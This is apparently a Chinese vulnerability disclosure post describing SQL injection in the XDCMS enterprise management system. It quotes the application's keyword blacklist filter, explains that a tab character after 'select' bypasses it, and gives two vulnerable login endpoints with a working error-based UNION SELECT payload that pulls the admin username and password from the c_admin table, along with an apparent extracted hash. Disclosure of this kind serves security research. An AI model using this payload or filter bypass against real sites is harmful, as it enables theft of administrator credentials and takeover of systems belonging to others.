XDCMS企业管理系统SQL #1~2

漏洞作者: roker

看到这个函数。

[php]
function safe_html($str){

if(empty($str)){return;}

if (preg_match('/\b select\b |\b insert\b | \b update\b | \b and\b | \b in\b | \b on\b | \b left\b |\b joins\b | \b delete\b |\%|\=|\/\*|\*| \b union\b |\.\.\/|\.\/| \b from\b | \b where\b | \b group\b | \binto\b |\bload_file\b

|\boutfile\b/i',$str)){showmsg(C('error'),'-1');}

return htmlspecialchars($str, ENT_COMPAT ,'GB2312');

}
[/php]

select+tab键 就可以了嘛~
第一处

url: xxx.xxx/index.php?m=member&f=login_save

post 如下数据

[php]

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b#

[/php]

01142805b1284d6e0a9d24ad5a5b34663ca4ee70

 

注入到管理账号密码

第二处 index.php?m=xdcms&c=login&f=check

同第一处所示。

一样的exp。

发表评论